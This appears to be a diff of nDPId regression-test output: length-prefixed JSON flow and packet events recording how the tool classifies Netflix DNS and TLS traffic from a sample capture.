{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035080,"flow_last_seen":1484319035200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035200,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035080,"flow_last_seen":1484319035215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035215,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035342,"flow_last_seen":1484319035342,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035342,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1484319035342,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035342,"pkt":"gCqoTGHM5JjWH70UCABFAABA3CdAAEAGQP3AqAEHNFkni8+OAbvRf5R9AAAAALAC\/\/8BVgAAAgQFtAEDAwUBAQgKH2TBaAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1484319035397,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035397,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwG7z47YAyXj0X+UfqASRepXrQAAAgQFtAQCCAqtiMk\/H2TBaAEDAwg="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1484319035399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035399,"pkt":"gCqoTGHM5JjWH70UCABFAAA0+2BAAEAGIdDAqAEHNFkni8+OAbvRf5R+2AMl5IAQEBW8GgAAAQEICh9kwZ2tiMk\/"} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035342,"flow_last_seen":1484319035401,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035342,"flow_last_seen":1484319035449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319035449,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1484319035889,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":164,"pkt_l4_len":130,"thread_ts_msec":1484319035889,"pkt":"AQBef\/\/65JjWH70UCABFAACW0KMAAAERNwrAqAEH7\/\/\/+tIQB2wAggqVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjptZHgtbmV0ZmxpeC1jb206c2VydmljZTp0YXJnZXQ6MA0KDQo="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036827,"flow_last_seen":1484319036827,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1484319036827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1484319036827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1484319036827,"pkt":"gCqoTGHM5JjWH70UCABFAABHX6YAAP8R2KbAqAEHwKgBAeF3ADUAM2aFMVgBAAABAAAAAAAABHNoYTIDc2FuBGFrYW0HbmZseGltZwNuZXQAAAEAAQ=="} 00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036827,"flow_last_seen":1484319036827,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1484319036827,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1484319036847,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":137,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":137,"pkt_l4_len":103,"thread_ts_msec":1484319036847,"pkt":"5JjWH70UgCqoTGHMCABFAAB74URAAEAR1dTAqAEBwKgBBwA14XcAZ3RRMViBgAABAAIAAAAABHNoYTIDc2FuBGFrYW0HbmZseGltZwNuZXQAAAEAAcAMAAUAAQAAACAAGAVlMzA2NwRkc2NnCmFrYW1haWVkZ2XAIsA3AAEAAQAAABIABGhWYbM="} 00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1484319036847,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"sha2.san.akam.nflximg.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.86.97.179"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036854,"flow_last_seen":1484319036854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319036854,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1484319036854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319036854,"pkt":"gCqoTGHM5JjWH70UCABFAABAqeJAAEAGBR3AqAEHaFZhs8+VAbsXO1WDAAAAALAC\/\/+GqQAAAgQFtAEDAwUBAQgKH2THJwAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1484319036865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319036865,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwGsuNoVmGzwKgBBwG7z5WR\/xaXFztVhKAScSAP4QAAAgQFtAQCCAoCM2vSH2THJwEDAwU="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1484319036868,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319036868,"pkt":"gCqoTGHM5JjWH70UCABFAAA0UCJAAEAGXunAqAEHaFZhs8+VAbsXO1WEkf8WmIAQEBWfqAAAAQEICh9kxzUCM2vS"} -00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319036854,"flow_last_seen":1484319036870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1484319036870,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319036854,"flow_last_seen":1484319036889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319036889,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":333,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1484319036854,"flow_last_seen":1484319036900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3641,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":1484319036900,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","server_names":"secure.cdn.nflximg.net,*.nflxext.com,*.nflxvideo.net,*.nflxsearch.net,*.nrd.nflximg.net,*.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=Los Gatos, O=Netflix, Inc., OU=Content Delivery Operations, CN=secure.cdn.nflximg.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"0D:EF:D1:E6:29:11:1A:A5:88:B3:2F:04:65:D6:D7:AD:84:A2:52:26"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319036854,"flow_last_seen":1484319036854,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319036854,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1484319036854,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319036854,"pkt":"gCqoTGHM5JjWH70UCABFAABAqeJAAEAGBR3AqAEHaFZhs8+VAbsXO1WDAAAAALAC\/\/+GqQAAAgQFtAEDAwUBAQgKH2THJwAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1484319036865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319036865,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwGsuNoVmGzwKgBBwG7z5WR\/xaXFztVhKAScSAP4QAAAgQFtAQCCAoCM2vSH2THJwEDAwU="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1484319036868,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319036868,"pkt":"gCqoTGHM5JjWH70UCABFAAA0UCJAAEAGXunAqAEHaFZhs8+VAbsXO1WEkf8WmIAQEBWfqAAAAQEICh9kxzUCM2vS"} +00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319036854,"flow_last_seen":1484319036870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1484319036870,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319036854,"flow_last_seen":1484319036889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1484319036889,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":333,"source":"netflix.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1484319036854,"flow_last_seen":1484319036900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3641,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":1484319036900,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"104.86.97.179","src_port":53141,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"art-s.nflximg.net","server_names":"secure.cdn.nflximg.net,*.nflxext.com,*.nflxvideo.net,*.nflxsearch.net,*.nrd.nflximg.net,*.nflximg.net","ja3":"c07cb55f88702033a8f52c046d23e0b2","ja3s":"ef6b224ce027c8e21e5a25d8a58255a3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=Los Gatos, O=Netflix, Inc., OU=Content Delivery Operations, CN=secure.cdn.nflximg.net","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"0D:EF:D1:E6:29:11:1A:A5:88:B3:2F:04:65:D6:D7:AD:84:A2:52:26"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319042988,"flow_last_seen":1484319042988,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1484319042988,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1484319042988,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1484319042988,"pkt":"gCqoTGHM5JjWH70UCABFAABGkh4AAP8Rpi\/AqAEHwKgBAecsADUAMtLh8roBAAABAAAAAAAAB2FydHdvcmsEYWthbQduZmx4aW1nA25ldAAAAQAB"} 00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319042988,"flow_last_seen":1484319042988,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1484319042988,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1484319043002,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":148,"pkt_l4_len":114,"thread_ts_msec":1484319043002,"pkt":"5JjWH70UgCqoTGHMCABFAACG4UVAAEAR1cjAqAEBwKgBBwA15ywAct6B8rqBgAABAAMAAAAAB2FydHdvcmsEYWthbQduZmx4aW1nA25ldAAAAQABwAwABQABAAAAUwAUBWExOTA3BGRzY2cGYWthbWFpwCHANgABAAEAAAAHAAS4GcwZwDYAAQABAAAABwAEuBnMCg=="} 00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":609,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1484319043002,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.25"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043012,"flow_last_seen":1484319043012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319043012,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1484319043012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319043012,"pkt":"gCqoTGHM5JjWH70UCABFAABA10xAAEAGHYnAqAEHuBnMGc+cAFC2IFmCAAAAALAC\/\/8TjwAAAgQFtAEDAwUBAQgKH2TelwAAAAAEAgAA"} 